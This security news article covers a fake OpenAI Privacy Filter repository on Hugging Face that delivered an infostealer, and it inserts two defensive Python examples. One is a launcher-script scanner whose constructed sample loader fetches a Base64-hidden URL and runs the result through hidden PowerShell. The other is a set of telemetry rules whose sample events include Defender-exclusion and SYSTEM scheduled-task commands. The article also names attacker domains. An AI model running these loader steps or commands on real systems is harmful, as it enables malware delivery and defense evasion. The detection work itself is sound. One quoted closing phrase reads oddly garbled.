Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads

A malicious Hugging Face repository managed to reach the platform's trending list by posing as the open-weight release of OpenAI's Privacy Filter model, using the lure to deliver a Rust-based infostealer to Windows users.
The project, called Open-OSS/privacy-filter, impersonated the official counterpart released by OpenAI late last month (openai/privacy-filter), going as far as copying its entire description verbatim to trick unwary users into downloading it. Hugging Face has since blocked access to the malicious model.
Privacy Filter was launched in April 2026 by the artificial intelligence (AI) company as a way to detect and redact personally identifiable information (PII) in unstructured text, with the aim of building strong privacy and security protections into applications.
“The repository cloned the official OpenAI Privacy Filter release, copied its model card almost verbatim, and sent a loader.py file that downloads and executes the infostealer malware on Windows machines,” the HiddenLayer Research Team said in a report published last week.
The malicious project instructs users to clone the repository and run a batch script (“start.bat”) on Windows or a Python script (“loader.py”) on Linux or macOS to install all necessary dependencies and start the model.
Once launched, the Python script executes malicious code that disables SSL certificate verification, decodes a Base64-encoded URL hosted on JSON Keeper, and uses it to retrieve a command that is passed to PowerShell.
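As an added illustration of the loader behaviour described above (example code written for this article, not HiddenLayer's tooling and not taken from any of the repositories named here), the following static triage script scores a model repository's launcher file before anyone runs it. It looks for the constructs the report attributes to the malicious loader: disabled TLS certificate verification, a Base64-decoded URL, a remote fetch, and a command handed to PowerShell with a hidden window. The indicator weights, the verdict threshold and both sample scripts are constructed for the example; the patterns are text-based so the same scan works on a Python loader and on a Windows batch launcher.

```python
"""Static triage of a model repository's launcher script before it is run.

Added example, not code from the HiddenLayer report or from any of the
repositories it names. Indicator weights and the verdict threshold are
assumptions for illustration; both sample scripts below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Pattern, Tuple

# (indicator name, pattern, weight). Patterns are deliberately text-based so the
# same scan works on a Python loader and on a Windows batch launcher.
INDICATORS: List[Tuple[str, Pattern[str], int]] = [
    ("tls_verification_disabled",
     re.compile(r"_create_unverified_context|verify\s*=\s*False|CERT_NONE"), 3),
    ("base64_decode", re.compile(r"b64decode|FromBase64String", re.IGNORECASE), 1),
    ("powershell_invocation", re.compile(r"\bpowershell(\.exe)?\b|\bpwsh\b", re.IGNORECASE), 3),
    ("shell_spawn", re.compile(r"subprocess\.(run|Popen|call)\b|os\.system\("), 2),
    ("remote_fetch", re.compile(r"urlopen\(|requests\.get\(|urlretrieve\("), 1),
    # \W+ so the pattern also matches argv-list form: "-WindowStyle", "Hidden"
    ("hidden_window", re.compile(r"-WindowStyle\W+Hidden|CREATE_NO_WINDOW", re.IGNORECASE), 2),
]


@dataclass
class TriageResult:
    score: int = 0
    hits: Dict[str, List[int]] = field(default_factory=dict)  # indicator -> line numbers

    @property
    def verdict(self) -> str:
        # Threshold is an assumption; tune it against your own corpus of benign loaders.
        if self.score >= 6:
            return "suspicious"
        return "review" if self.score >= 3 else "clean"


def triage_script(text: str) -> TriageResult:
    """Score a launcher script; each indicator counts once, but every hit line is recorded."""
    result = TriageResult()
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern, weight in INDICATORS:
            if pattern.search(line):
                if name not in result.hits:
                    result.score += weight
                result.hits.setdefault(name, []).append(lineno)
    return result


# Constructed sample with the shape the article describes (the placeholder
# Base64 string decodes to https://example.invalid/). Scanner input only.
SUSPICIOUS_LOADER = """\
import base64, ssl, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQv").decode()
cmd = urllib.request.urlopen(url).read().decode()
subprocess.run(["powershell", "-WindowStyle", "Hidden", "-Command", cmd])
"""

# Constructed benign launcher: installs requirements and loads the model locally.
BENIGN_LOADER = """\
import subprocess, sys
subprocess.check_call([sys.executable, "-m", "pip", "install", "-r", "requirements.txt"])
from transformers import pipeline
clf = pipeline("token-classification", model="./model")
"""

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_LOADER), ("benign", BENIGN_LOADER)):
        r = triage_script(src)
        print(f"{label}: verdict={r.verdict} score={r.score} hits={r.hits}")
```

The point of recording line numbers per indicator is that a reviewer can jump straight to the offending statements; a launcher that legitimately shells out to pip scores low, while one that combines disabled certificate checks, an obscured URL and a hidden PowerShell invocation crosses the threshold on that combination rather than on any single pattern.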
The PowerShell command downloads a batch script from a remote server (“api.eth-fastscan[.]org”) and runs it via “cmd.exe.” The batch script acts as a second-stage downloader that prepares the environment by elevating privileges through a User Account Control (UAC) prompt, adding an exclusion to Microsoft Defender Antivirus, downloading the next-stage binaries from the same domain, and registering a scheduled task that launches PowerShell.
Once the scheduled task has been started, the malware waits two seconds before deleting the task. The final stage is an information stealer designed to take screenshots and harvest data from Discord, cryptocurrency wallets and wallet browser extensions, system metadata, files such as FileZilla settings and wallet seed phrases, and web browsers based on the Chromium and Gecko rendering engines.
“Despite using a scheduled task, this layer does not guarantee persistence: the task is destroyed before any restart. It is used as a one-shot SYSTEM context launcher,” explains HiddenLayer.
The stealer also checks for debuggers and sandboxes, verifies that it is not running in a virtual machine, and attempts to disable the Windows Antimalware Scan Interface (AMSI) and Event Tracing for Windows (ETW) to evade behavioral detection. The stolen data is exfiltrated in JSON format to the “recargapopular[.]com” domain.
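The staging behaviour in the preceding paragraphs is also what endpoint telemetry should catch. The following is an added example (not HiddenLayer's detection content) of process-creation rules run over constructed event records in the shape a Sysmon event ID 1 or EDR feed would provide: PowerShell spawned directly by a Python interpreter, a Defender exclusion added from the command line, a scheduled task registered to run as SYSTEM that launches PowerShell, and that task being deleted within seconds of creation, which is the one-shot launcher pattern HiddenLayer describes rather than persistence. Paths, PIDs, timestamps and the task name are placeholders.

```python
"""Process-creation telemetry rules for the staging chain described above.

Added example, not HiddenLayer's detection content. Events are constructed
dicts in the shape a Sysmon event ID 1 / EDR feed would give (timestamp,
pid, ppid, image, command line); paths, PIDs and task names are placeholders.
"""
import re
from typing import Dict, List

Event = Dict[str, object]

# Constructed telemetry for one host, in time order.
EVENTS: List[Event] = [
    {"ts": 0.0, "pid": 100, "ppid": 1, "image": r"C:\Python312\python.exe",
     "cmdline": "python.exe loader.py"},
    {"ts": 1.2, "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -Command <decoded-command-placeholder>"},
    {"ts": 2.5, "pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\u\AppData\Local\Temp\stage2.bat"},
    {"ts": 3.0, "pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\u\AppData\Local\Temp"},
    {"ts": 4.0, "pid": 500, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn UpdTask /ru SYSTEM /sc once /st 00:00 '
                r'/tr "powershell.exe -File C:\Users\u\AppData\Local\Temp\stage3.ps1" /f'},
    {"ts": 4.2, "pid": 501, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /run /tn UpdTask"},
    {"ts": 6.5, "pid": 502, "ppid": 300, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /delete /tn UpdTask /f"},
    {"ts": 60.0, "pid": 600, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
]

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")
TASK_NAME = re.compile(r'/tn\s+"?([^\s"]+)', re.IGNORECASE)


def _basename(path: object) -> str:
    return str(path).replace("\\", "/").rsplit("/", 1)[-1].lower()


def ancestry(events: List[Event], pid: object) -> List[str]:
    """Image basenames from the process itself up to the root of its tree."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: List[Event], one_shot_window: float = 300.0) -> List[str]:
    """Return one alert string per matched rule, in event order."""
    alerts: List[str] = []
    created: Dict[str, float] = {}  # task name -> creation timestamp
    for e in events:
        img, cmd = _basename(e["image"]), str(e["cmdline"])
        low = cmd.lower()
        chain = ancestry(events, e["pid"])
        # 1. A model loader's Python interpreter directly spawning a shell.
        if img in SHELLS and len(chain) > 1 and chain[1] == "python.exe":
            alerts.append(f"shell_spawned_from_python pid={e['pid']}")
        # 2. Defender exclusion added from the command line.
        if "add-mppreference" in low and "-exclusion" in low:
            alerts.append(f"defender_exclusion_added pid={e['pid']}")
        # 3. Scheduled task registered to run as SYSTEM that launches PowerShell.
        if img == "schtasks.exe" and "/create" in low:
            m = TASK_NAME.search(cmd)
            name = m.group(1) if m else "?"
            if "/ru system" in low and "powershell" in low:
                alerts.append(f"system_task_launches_powershell task={name}")
            created[name] = float(e["ts"])  # type: ignore[arg-type]
        # 4. Task removed shortly after creation: a one-shot launcher, not persistence.
        if img == "schtasks.exe" and "/delete" in low:
            m = TASK_NAME.search(cmd)
            name = m.group(1) if m else "?"
            if name in created:
                lifetime = float(e["ts"]) - created[name]  # type: ignore[arg-type]
                if lifetime <= one_shot_window:
                    alerts.append(f"one_shot_task task={name} lifetime={lifetime:.1f}s")
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Rule 4 is the one worth keeping even if the others are noisy in your environment: a task that exists for a couple of seconds never shows up in a later persistence sweep, so it has to be correlated at creation time from the create/delete pair, exactly the gap the report's "one-shot SYSTEM context launcher" wording points at.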

Before it was taken down, the model is said to have reached the #1 trending spot on Hugging Face with nearly 244,000 downloads and 667 likes within 18 hours. It is suspected that these numbers were artificially inflated to lend the repository an illusion of credibility and entice users into downloading it.
Further analysis uncovered six other repositories carrying the same malicious Python loader:
- anthfu/Bonsai-8B-gguf
- anthfu/Qwen3.6-35B-A3B-APEX-GGUF
- anthfu/DeepSeek-V4-Pro
- anthfu/Qwopus-GLM-18B-Integrated-GGUF
- anthfu/Qwen3.6-35B-A3B-Claude-4.6-Opus-Reasoning-Distilled-GGUF
- anthfu/supergemma4-26b-uncensored-gguf-v2
HiddenLayer said it also observed the “api[.]eth-fastscan[.]org” domain being used to serve a different Windows executable (“o0q2l47f.exe”) that beacons to “welovechinatown[.]info,” a command-and-control (C2) server previously used in a campaign that leveraged a malicious npm package called trevlo to deliver ValleyRAT (aka Winos 4.0).
“The package’s post-installation hook silently creates an obfuscated JavaScript loader that displays a base64-encoded PowerShell command, which then downloads and executes a second-level PowerShell script on an attacker-controlled infrastructure,” Panther noted last month.

“That script downloads and executes a fully executable Winos 4.0 stager (“CodeRun102.exe”) binary, complete with hidden window signing, Zone Identifier removal, and process isolation.”
The attack is notable because it represents a new initial access vector for ValleyRAT, a remote access trojan that has so far been distributed via phishing emails and search engine optimization (SEO) poisoning. The use of ValleyRAT has been attributed exclusively to a Chinese hacking group called Silver Fox.
“The shared infrastructure suggests that these campaigns are likely to be interconnected and part of a wider supply chain targeting open natural resources,” HiddenLayer said.



